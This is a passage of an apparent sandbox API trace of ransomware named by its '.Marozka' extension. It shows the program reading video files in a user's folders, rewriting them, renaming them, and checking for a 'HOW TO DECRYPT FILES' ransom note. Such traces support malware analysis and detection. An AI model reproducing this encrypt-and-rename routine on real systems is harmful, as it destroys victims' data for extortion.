lpFileName="C:\\Users\\FD1HVy\\Videos\\ArkZk4pr2pX\\drjA.avi", nBufferLength=0x105, lpBuffer=0x5be56c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos\\ArkZk4pr2pX\\drjA.avi", lpFilePart=0x0) returned 0x2b [0058.799] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\ArkZk4pr2pX\\drjA.avi.Marozka", nBufferLength=0x105, lpBuffer=0x5be56c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos\\ArkZk4pr2pX\\drjA.avi.Marozka", lpFilePart=0x0) returned 0x33 [0058.799] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea20) returned 1 [0058.799] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\ArkZk4pr2pX\\drjA.avi" (normalized: "c:\\users\\fd1hvy\\videos\\arkzk4pr2px\\drja.avi"), fInfoLevelId=0x0, lpFileInformation=0x5bea9c | out: lpFileInformation=0x5bea9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeab7eaa0, ftCreationTime.dwHighDateTime=0x1d4c92d, ftLastAccessTime.dwLowDateTime=0xbf877490, ftLastAccessTime.dwHighDateTime=0x1d4c9eb, ftLastWriteTime.dwLowDateTime=0xe5c81519, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0x13070)) returned 1 [0058.799] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea1c) returned 1 [0058.799] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Videos\\ArkZk4pr2pX\\drjA.avi" (normalized: "c:\\users\\fd1hvy\\videos\\arkzk4pr2px\\drja.avi"), lpNewFileName="C:\\Users\\FD1HVy\\Videos\\ArkZk4pr2pX\\drjA.avi.Marozka" (normalized: "c:\\users\\fd1hvy\\videos\\arkzk4pr2px\\drja.avi.marozka")) returned 1 [0058.800] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\ArkZk4pr2pX\\GU_HJAOUy.mp4", nBufferLength=0x105, lpBuffer=0x5be45c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos\\ArkZk4pr2pX\\GU_HJAOUy.mp4", lpFilePart=0x0) returned 0x30 [0058.800] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be9a0) returned 1 [0058.800] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\ArkZk4pr2pX\\GU_HJAOUy.mp4" (normalized: "c:\\users\\fd1hvy\\videos\\arkzk4pr2px\\gu_hjaouy.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0058.800] GetFileType (hFile=0x2e0) returned 0x1 [0058.800] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be99c) returned 1 [0058.800] GetFileType (hFile=0x2e0) returned 0x1 [0058.800] GetFileSize (in: hFile=0x2e0, lpFileSizeHigh=0x5bea9c | out: lpFileSizeHigh=0x5bea9c*=0x0) returned 0x8e3e [0058.800] ReadFile (in: hFile=0x2e0, lpBuffer=0x279cb04, nNumberOfBytesToRead=0x8e3e, lpNumberOfBytesRead=0x5bea48, lpOverlapped=0x0 | out: lpBuffer=0x279cb04*, lpNumberOfBytesRead=0x5bea48*=0x8e3e, lpOverlapped=0x0) returned 1 [0058.801] CloseHandle (hObject=0x2e0) returned 1 [0058.826] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be560, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0058.826] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea14) returned 1 [0058.826] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5bea90 | out: lpFileInformation=0x5bea90*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0058.826] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea10) returned 1 [0058.826] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\ArkZk4pr2pX\\GU_HJAOUy.mp4", nBufferLength=0x105, lpBuffer=0x5be448, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos\\ArkZk4pr2pX\\GU_HJAOUy.mp4", lpFilePart=0x0) returned 0x30 [0058.826] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be98c) returned 1 [0058.826] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\ArkZk4pr2pX\\GU_HJAOUy.mp4" (normalized: "c:\\users\\fd1hvy\\videos\\arkzk4pr2px\\gu_hjaouy.mp4"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0058.827] GetFileType (hFile=0x2e0) returned 0x1 [0058.827] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be988) returned 1 [0058.828] GetFileType (hFile=0x2e0) returned 0x1 [0058.828] WriteFile (in: hFile=0x2e0, lpBuffer=0x2816030*, nNumberOfBytesToWrite=0x8e40, lpNumberOfBytesWritten=0x5bea3c, lpOverlapped=0x0 | out: lpBuffer=0x2816030*, lpNumberOfBytesWritten=0x5bea3c*=0x8e40, lpOverlapped=0x0) returned 1 [0058.890] CloseHandle (hObject=0x2e0) returned 1 [0058.892] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\ArkZk4pr2pX\\GU_HJAOUy.mp4", nBufferLength=0x105, lpBuffer=0x5be56c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos\\ArkZk4pr2pX\\GU_HJAOUy.mp4", lpFilePart=0x0) returned 0x30 [0058.892] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\ArkZk4pr2pX\\GU_HJAOUy.mp4.Marozka", nBufferLength=0x105, lpBuffer=0x5be56c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos\\ArkZk4pr2pX\\GU_HJAOUy.mp4.Marozka", lpFilePart=0x0) returned 0x38 [0058.892] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea20) returned 1 [0058.892] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\ArkZk4pr2pX\\GU_HJAOUy.mp4" (normalized: "c:\\users\\fd1hvy\\videos\\arkzk4pr2px\\gu_hjaouy.mp4"), fInfoLevelId=0x0, lpFileInformation=0x5bea9c | out: lpFileInformation=0x5bea9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6627aea0, ftCreationTime.dwHighDateTime=0x1d4d0bd, ftLastAccessTime.dwLowDateTime=0x26fa5830, ftLastAccessTime.dwHighDateTime=0x1d4cdc1, ftLastWriteTime.dwLowDateTime=0xe5d3e8f2, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0x8e40)) returned 1 [0058.892] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea1c) returned 1 [0058.893] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Videos\\ArkZk4pr2pX\\GU_HJAOUy.mp4" (normalized: "c:\\users\\fd1hvy\\videos\\arkzk4pr2px\\gu_hjaouy.mp4"), lpNewFileName="C:\\Users\\FD1HVy\\Videos\\ArkZk4pr2pX\\GU_HJAOUy.mp4.Marozka" (normalized: "c:\\users\\fd1hvy\\videos\\arkzk4pr2px\\gu_hjaouy.mp4.marozka")) returned 1 [0058.894] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\ArkZk4pr2pX\\r44nzkqCKiXBmgcwm.mp4", nBufferLength=0x105, lpBuffer=0x5be45c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos\\ArkZk4pr2pX\\r44nzkqCKiXBmgcwm.mp4", lpFilePart=0x0) returned 0x38 [0058.894] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be9a0) returned 1 [0058.894] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\ArkZk4pr2pX\\r44nzkqCKiXBmgcwm.mp4" (normalized: "c:\\users\\fd1hvy\\videos\\arkzk4pr2px\\r44nzkqckixbmgcwm.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0058.894] GetFileType (hFile=0x2e0) returned 0x1 [0058.894] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be99c) returned 1 [0058.894] GetFileType (hFile=0x2e0) returned 0x1 [0058.894] GetFileSize (in: hFile=0x2e0, lpFileSizeHigh=0x5bea9c | out: lpFileSizeHigh=0x5bea9c*=0x0) returned 0x1856a [0058.894] ReadFile (in: hFile=0x2e0, lpBuffer=0x378c550, nNumberOfBytesToRead=0x1856a, lpNumberOfBytesRead=0x5bea48, lpOverlapped=0x0 | out: lpBuffer=0x378c550*, lpNumberOfBytesRead=0x5bea48*=0x1856a, lpOverlapped=0x0) returned 1 [0058.895] CloseHandle (hObject=0x2e0) returned 1 [0059.009] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be560, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0059.010] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea14) returned 1 [0059.010] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5bea90 | out: lpFileInformation=0x5bea90*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0059.010] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea10) returned 1 [0059.010] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\ArkZk4pr2pX\\r44nzkqCKiXBmgcwm.mp4", nBufferLength=0x105, lpBuffer=0x5be448, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos\\ArkZk4pr2pX\\r44nzkqCKiXBmgcwm.mp4", lpFilePart=0x0) returned 0x38 [0059.010] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be98c) returned 1 [0059.010] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\ArkZk4pr2pX\\r44nzkqCKiXBmgcwm.mp4" (normalized: "c:\\users\\fd1hvy\\videos\\arkzk4pr2px\\r44nzkqckixbmgcwm.mp4"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0059.011] GetFileType (hFile=0x2e0) returned 0x1 [0059.011] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be988) returned 1 [0059.011] GetFileType (hFile=0x2e0) returned 0x1 [0059.011] WriteFile (in: hFile=0x2e0, lpBuffer=0x38060b8*, nNumberOfBytesToWrite=0x18570, lpNumberOfBytesWritten=0x5bea3c, lpOverlapped=0x0 | out: lpBuffer=0x38060b8*, lpNumberOfBytesWritten=0x5bea3c*=0x18570, lpOverlapped=0x0) returned 1 [0059.013] CloseHandle (hObject=0x2e0) returned 1 [0059.016] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\ArkZk4pr2pX\\r44nzkqCKiXBmgcwm.mp4", nBufferLength=0x105, lpBuffer=0x5be56c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos\\ArkZk4pr2pX\\r44nzkqCKiXBmgcwm.mp4", lpFilePart=0x0) returned 0x38 [0059.016] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\ArkZk4pr2pX\\r44nzkqCKiXBmgcwm.mp4.Marozka", nBufferLength=0x105, lpBuffer=0x5be56c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos\\ArkZk4pr2pX\\r44nzkqCKiXBmgcwm.mp4.Marozka", lpFilePart=0x0) returned 0x40 [0059.016] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea20) returned 1 [0059.016] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\ArkZk4pr2pX\\r44nzkqCKiXBmgcwm.mp4" (normalized: "c:\\users\\fd1hvy\\videos\\arkzk4pr2px\\r44nzkqckixbmgcwm.mp4"), fInfoLevelId=0x0, lpFileInformation=0x5bea9c | out: lpFileInformation=0x5bea9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9f515c10, ftCreationTime.dwHighDateTime=0x1d4d182, ftLastAccessTime.dwLowDateTime=0x2485cb20, ftLastAccessTime.dwHighDateTime=0x1d4d0f5, ftLastWriteTime.dwLowDateTime=0xe5e6fb9b, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0x18570)) returned 1 [0059.017] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea1c) returned 1 [0059.017] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Videos\\ArkZk4pr2pX\\r44nzkqCKiXBmgcwm.mp4" (normalized: "c:\\users\\fd1hvy\\videos\\arkzk4pr2px\\r44nzkqckixbmgcwm.mp4"), lpNewFileName="C:\\Users\\FD1HVy\\Videos\\ArkZk4pr2pX\\r44nzkqCKiXBmgcwm.mp4.Marozka" (normalized: "c:\\users\\fd1hvy\\videos\\arkzk4pr2px\\r44nzkqckixbmgcwm.mp4.marozka")) returned 1 [0059.018] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5beaf4) returned 1 [0059.018] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\CRJCsTY6F0koOi", nBufferLength=0x105, lpBuffer=0x5be5a8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos\\CRJCsTY6F0koOi", lpFilePart=0x0) returned 0x25 [0059.018] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\CRJCsTY6F0koOi\\*", lpFindFileData=0x5be81c | out: lpFindFileData=0x5be81c) returned 0xa7db48 [0059.018] FindNextFileW (in: hFindFile=0xa7db48, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0059.018] FindNextFileW (in: hFindFile=0xa7db48, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0059.018] FindNextFileW (in: hFindFile=0xa7db48, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0059.019] FindNextFileW (in: hFindFile=0xa7db48, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0059.019] FindNextFileW (in: hFindFile=0xa7db48, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0059.019] FindNextFileW (in: hFindFile=0xa7db48, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0059.019] FindNextFileW (in: hFindFile=0xa7db48, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0059.019] FindNextFileW (in: hFindFile=0xa7db48, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 0 [0059.019] FindClose (in: hFindFile=0xa7db48 | out: hFindFile=0xa7db48) returned 1 [0059.019] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5beab0) returned 1 [0059.019] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5beabc) returned 1 [0059.019] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5beaf4) returned 1 [0059.020] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\CRJCsTY6F0koOi", nBufferLength=0x105, lpBuffer=0x5be5a8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos\\CRJCsTY6F0koOi", lpFilePart=0x0) returned 0x25 [0059.020] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\CRJCsTY6F0koOi\\*", lpFindFileData=0x5be81c | out: lpFindFileData=0x5be81c) returned 0xa7dc48 [0059.020] FindNextFileW (in: hFindFile=0xa7dc48, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0059.020] FindNextFileW (in: hFindFile=0xa7dc48, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0059.020] FindNextFileW (in: hFindFile=0xa7dc48, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0059.020] FindNextFileW (in: hFindFile=0xa7dc48, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0059.021] FindNextFileW (in: hFindFile=0xa7dc48, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0059.021] FindNextFileW (in: hFindFile=0xa7dc48, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0059.021] FindNextFileW (in: hFindFile=0xa7dc48, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0059.021] FindNextFileW (in: hFindFile=0xa7dc48, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 0 [0059.021] FindClose (in: hFindFile=0xa7dc48 | out: hFindFile=0xa7dc48) returned 1 [0059.021] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5beab0) returned 1 [0059.021] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5beabc) returned 1 [0059.022] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\CRJCsTY6F0koOi\\gMXasKifI3Tkse40c4mX.mp4", nBufferLength=0x105, lpBuffer=0x5be45c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos\\CRJCsTY6F0koOi\\gMXasKifI3Tkse40c4mX.mp4", lpFilePart=0x0) returned 0x3e [0059.022] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be9a0) returned 1 [0059.022] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\CRJCsTY6F0koOi\\gMXasKifI3Tkse40c4mX.mp4" (normalized: "c:\\users\\fd1hvy\\videos\\crjcsty6f0kooi\\gmxaskifi3tkse40c4mx.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0059.022] GetFileType (hFile=0x2e0) returned 0x1 [0059.022] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be99c) returned 1 [0059.022] GetFileType (hFile=0x2e0) returned 0x1 [0059.022] GetFileSize (in: hFile=0x2e0, lpFileSizeHigh=0x5bea9c | out: lpFileSizeHigh=0x5bea9c*=0x0) returned 0x15a3 [0059.022] ReadFile (in: hFile=0x2e0, lpBuffer=0x266f424, nNumberOfBytesToRead=0x15a3, lpNumberOfBytesRead=0x5bea48, lpOverlapped=0x0 | out: lpBuffer=0x266f424*, lpNumberOfBytesRead=0x5bea48*=0x15a3, lpOverlapped=0x0) returned 1 [0059.022] CloseHandle (hObject=0x2e0) returned 1 [0059.106] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be560, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0059.106] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea14) returned 1 [0059.106] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5bea90 | out: lpFileInformation=0x5bea90*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0059.106] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea10) returned 1 [0059.107] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\CRJCsTY6F0koOi\\gMXasKifI3Tkse40c4mX.mp4", nBufferLength=0x105, lpBuffer=0x5be448, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos\\CRJCsTY6F0koOi\\gMXasKifI3Tkse40c4mX.mp4", lpFilePart=0x0) returned 0x3e [0059.107] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be98c) returned 1 [0059.107] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\CRJCsTY6F0koOi\\gMXasKifI3Tkse40c4mX.mp4" (normalized: "c:\\users\\fd1hvy\\videos\\crjcsty6f0kooi\\gmxaskifi3tkse40c4mx.mp4"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0059.108] GetFileType (hFile=0x2e0) returned 0x1 [0059.108] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be988) returned 1 [0059.108] GetFileType (hFile=0x2e0) returned 0x1 [0059.108] WriteFile (in: hFile=0x2e0, lpBuffer=0x26c2fdc*, nNumberOfBytesToWrite=0x15b0, lpNumberOfBytesWritten=0x5bea3c, lpOverlapped=0x0 | out: lpBuffer=0x26c2fdc*, lpNumberOfBytesWritten=0x5bea3c*=0x15b0, lpOverlapped=0x0) returned 1 [0059.109] CloseHandle (hObject=0x2e0) returned 1 [0059.110] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\CRJCsTY6F0koOi\\gMXasKifI3Tkse40c4mX.mp4", nBufferLength=0x105, lpBuffer=0x5be56c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos\\CRJCsTY6F0koOi\\gMXasKifI3Tkse40c4mX.mp4", lpFilePart=0x0) returned 0x3e [0059.110] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\CRJCsTY6F0koOi\\gMXasKifI3Tkse40c4mX.mp4.Marozka", nBufferLength=0x105, lpBuffer=0x5be56c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos\\CRJCsTY6F0koOi\\gMXasKifI3Tkse40c4mX.mp4.Marozka", lpFilePart=0x0) returned 0x46 [0059.110] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea20) returned 1 [0059.110] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\CRJCsTY6F0koOi\\gMXasKifI3Tkse40c4mX.mp4" (normalized: "c:\\users\\fd1hvy\\videos\\crjcsty6f0kooi\\gmxaskifi3tkse40c4mx.mp4"), fInfoLevelId=0x0, lpFileInformation=0x5bea9c | out: lpFileInformation=0x5bea9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee5a4790, ftCreationTime.dwHighDateTime=0x1d4ca52, ftLastAccessTime.dwLowDateTime=0x7d3962a0, ftLastAccessTime.dwHighDateTime=0x1d4cc80, ftLastWriteTime.dwLowDateTime=0xe5f54e08, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0x15b0)) returned 1 [0059.110] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea1c) returned 1 [0059.110] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Videos\\CRJCsTY6F0koOi\\gMXasKifI3Tkse40c4mX.mp4" (normalized: "c:\\users\\fd1hvy\\videos\\crjcsty6f0kooi\\gmxaskifi3tkse40c4mx.mp4"), lpNewFileName="C:\\Users\\FD1HVy\\Videos\\CRJCsTY6F0koOi\\gMXasKifI3Tkse40c4mX.mp4.Marozka" (normalized: "c:\\users\\fd1hvy\\videos\\crjcsty6f0kooi\\gmxaskifi3tkse40c4mx.mp4.marozka")) returned 1 [0059.111] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\CRJCsTY6F0koOi\\Q_SZzIUN.mp4", nBufferLength=0x105, lpBuffer=0x5be45c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos\\CRJCsTY6F0koOi\\Q_SZzIUN.mp4", lpFilePart=0x0) returned 0x32 [0059.111] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be9a0) returned 1 [0059.111] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\CRJCsTY6F0koOi\\Q_SZzIUN.mp4" (normalized: "c:\\users\\fd1hvy\\videos\\crjcsty6f0kooi\\q_szziun.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0059.111] GetFileType (hFile=0x2e0) returned 0x1 [0059.111] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be99c) returned 1 [0059.111] GetFileType (hFile=0x2e0) returned 0x1 [0059.112] GetFileSize (in: hFile=0x2e0, lpFileSizeHigh=0x5bea9c | out: lpFileSizeHigh=0x5bea9c*=0x0) returned 0x17422 [0059.114] ReadFile (in: hFile=0x2e0, lpBuffer=0x381e648, nNumberOfBytesToRead=0x17422, lpNumberOfBytesRead=0x5bea48, lpOverlapped=0x0 | out: lpBuffer=0x381e648*, lpNumberOfBytesRead=0x5bea48*=0x17422, lpOverlapped=0x0) returned 1 [0059.115] CloseHandle (hObject=0x2e0) returned 1 [0059.492] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be560, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0059.492] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea14) returned 1 [0059.492] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5bea90 | out: lpFileInformation=0x5bea90*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0059.493] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea10) returned 1 [0059.493] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\CRJCsTY6F0koOi\\Q_SZzIUN.mp4", nBufferLength=0x105, lpBuffer=0x5be448, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos\\CRJCsTY6F0koOi\\Q_SZzIUN.mp4", lpFilePart=0x0) returned 0x32 [0059.493] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be98c) returned 1 [0059.493] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\CRJCsTY6F0koOi\\Q_SZzIUN.mp4" (normalized: "c:\\users\\fd1hvy\\videos\\crjcsty6f0kooi\\q_szziun.mp4"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0059.494] GetFileType (hFile=0x2e0) returned 0x1 [0059.494] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be988) returned 1 [0059.494] GetFileType (hFile=0x2e0) returned 0x1 [0059.494] WriteFile (in: hFile=0x2e0, 